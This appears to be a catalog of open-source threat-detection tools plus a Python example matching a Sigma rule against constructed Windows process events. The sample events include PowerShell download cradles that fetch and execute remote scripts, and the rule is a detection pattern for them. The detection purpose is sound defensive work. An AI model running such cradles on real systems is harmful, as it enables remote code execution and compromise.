A library of portable detection tests mapped to the MITRE ATT&CK framework for security testing.
A generic and open signature format for describing log event detections, shareable across SIEM systems.
A curated list of awesome honeypot resources, tools, and related components for cybersecurity research and defense.
A pattern-matching tool for malware researchers to identify and classify malware samples using custom rules.
A cloud native runtime security tool for Linux that detects abnormal behavior and security threats in real-time.
A malicious traffic detection system that monitors network traffic for blacklisted threats and suspicious activities using public feeds and heuristics.
A high-quality, commented Sysmon configuration template for Windows system monitoring and incident investigation.
An open source CNAPP (cloud-native application protection platform) that hunts for threats in cloud native environments, ranks findings by risk, and visualizes attack paths.
A curated list of awesome open-source tools, detection rules, datasets, and resources for threat detection and hunting.
A curated list of awesome YARA rules, tools, and resources for malware researchers and security professionals.
A security tool that visualizes and analyzes Windows Active Directory event logs to investigate malicious logon activity.
A modular repository of Sysmon configuration modules for customizable endpoint detection and logging.
A modular, low-resource network honeypot that mimics services to detect breaches and alert on attacker interactions.
A Windows Batch script toolset that simulates Advanced Persistent Threat (APT) attack indicators to test security monitoring and detection capabilities.
A public repository for developing, testing, and maintaining detection rules for Elastic Security's SIEM, with tools for Detections as Code.
A collection of 200 Windows EVTX event log samples mapped to MITRE ATT&CK techniques for detection testing and threat hunting.
A Windows security tool for real-time adversary tradecraft detection, memory scanning, and forensics via behavior-driven rules.
A secure low-code honeypot framework that uses AI to create high-interaction decoy systems for cyber attack detection and analysis.
A suite of network fingerprinting standards for TLS, TCP, HTTP, SSH, and other protocols to facilitate threat detection and security analysis.
A Python tool that generates YARA rules for malware detection by filtering out strings and opcodes that appear in goodware.
An open source, serverless security data lake for AWS that normalizes logs, enables detection-as-code, and supports petabyte-scale threat hunting.
An open-source repository of security detections, analytic stories, and response playbooks mapped to MITRE ATT&CK for Splunk Enterprise Security.
A Linux distribution for network detection and response (NDR) built around Suricata, packaging the sensor, log pipeline, and analysis tooling as one platform.
Open-source detection logic (rules, YARA, EQL) for Elastic Security's endpoint protection against malware, ransomware, and advanced threats.
Open-source detection logic (rules, YARA, ransomware protection) for Elastic Security's endpoint protection platform.
A lightweight utility to generate malicious network traffic patterns for evaluating security controls and network visibility.
A libpcap-based package for extracting and analyzing network flow data in JSON format for security research and monitoring.
An extensible open-source framework for running, monitoring, and managing honeypots to detect and analyze cyber threats.
A curated list of resources, tools, and frameworks for detection engineering in cybersecurity.
A CI/CD security agent that monitors network egress, file integrity, and process activity on GitHub Actions runners to detect compromised builds and supply-chain tampering.
A lightweight Certificate Transparency log monitor that alerts you when SSL/TLS certificates are issued for your domains.
A framework of Python scripts for blue teams to test detection capabilities against malicious tradecraft modeled after MITRE ATT&CK.
An open-source blue team tool that protects Linux and Windows systems via honeypots, monitoring, and alerting.
A framework for developing rigorous, documented alerting and detection strategies to improve incident response efficacy.
A centralized platform for security monitoring and analysis, integrating big data technologies for log aggregation, threat detection, and behavioral analytics.
A standalone Python tool for applying Sigma detection rules directly to EVTX, Auditd, Sysmon for Linux, and other log formats without a SIEM.
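To make the Sigma format and the rule-to-log matching described in the two Sigma entries above concrete, here is an added example that is not code from any project in this catalog and not the Sigma project's own matching library. It implements a subset of Sigma's semantics (selection maps, the `contains`/`startswith`/`endswith`/`re`/`all` modifiers, `*` wildcards in plain values, case-insensitive matching, and `and`/`or`/`not` conditions) and runs a constructed rule over constructed Sysmon-style process-creation events. The rule is written as a Python dict rather than YAML to avoid a dependency; the field names, the rule, and the events are assumptions made for this example.

```python
"""Minimal Sigma-style rule evaluation over flat, normalised log events.

Added example; not the code of any catalogued project. Covers only a subset
of Sigma (enough to show how a shareable rule turns into a match decision).
"""
import fnmatch
import re

# Hypothetical rule laid out like a Sigma rule (title / logsource / detection).
# Field names follow Sysmon Event ID 1 (process creation); this example
# assumes events were already normalised to flat dicts using those names.
RULE = {
    "title": "PowerShell download cradle (example rule)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "IEX", "Invoke-Expression"],
        },
        "filter_admin": {"ParentImage|endswith": "\\ConfigMgr.exe"},
        "condition": "selection and not filter_admin",
    },
}

# Constructed sample events (not real telemetry). Addresses are documentation ranges.
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c IEX (Get-Content C:\\cm\\bootstrap.ps1)",
     "ParentImage": r"C:\Program Files\Microsoft Configuration Manager\bin\ConfigMgr.exe"},
    {"id": 4, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo IEX", "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 5, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-Expression (iwr https://203.0.113.9/x).Content",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _match_value(actual, expected, modifier):
    """Compare one event value against one rule value (case-insensitive, as in Sigma)."""
    if modifier == "re":
        return re.search(expected, str(actual)) is not None
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "":
        return fnmatch.fnmatchcase(a, e)  # plain values allow * and ? wildcards
    raise ValueError(f"unsupported modifier {modifier!r}")


def match_search(search, event):
    """A search map matches when every field matches; a list of maps is an OR of maps."""
    if isinstance(search, list):
        return any(match_search(s, event) for s in search)
    for spec, expected in search.items():
        field, *mods = spec.split("|")
        require_all = "all" in mods
        mods = [m for m in mods if m != "all"]
        modifier = mods[0] if mods else ""
        if field not in event:
            return False  # missing field never matches
        values = expected if isinstance(expected, list) else [expected]
        hits = [_match_value(event[field], v, modifier) for v in values]
        if not (all(hits) if require_all else any(hits)):
            return False
    return True


def eval_condition(condition, results):
    """Evaluate 'a and not (b or c)'-style conditions; precedence: not > and > or."""
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def parse_or():
        nonlocal pos
        value = parse_and()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            value = parse_and() or value
        return value

    def parse_and():
        nonlocal pos
        value = parse_not()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            value = parse_not() and value
        return value

    def parse_not():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "not":
            return not parse_not()
        if tok == "(":
            value = parse_or()
            pos += 1  # consume ')'
            return value
        return results[tok]  # KeyError on an identifier the rule never defined

    return parse_or()


def evaluate(rule, event):
    det = rule["detection"]
    results = {k: match_search(v, event) for k, v in det.items() if k != "condition"}
    return eval_condition(det["condition"], results)


def run_rule(rule, events):
    """Return the ids of events the rule fires on."""
    return [e["id"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    print(RULE["title"], "->", run_rule(RULE, EVENTS))
```

Event 3 shows why Sigma rules carry separate filter searches: the same cradle launched by a known management tool is suppressed by the condition rather than by loosening the selection. Real Sigma rules are YAML and are normally converted to backend queries (Splunk, Elastic, KQL) by the Sigma tooling; a standalone matcher like the one above trades that for the ability to replay rules over exported EVTX or Auditd logs offline.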
Open-Awesome is built by the community, for the community. Submit a project, suggest an awesome list, or help improve the catalog on GitHub.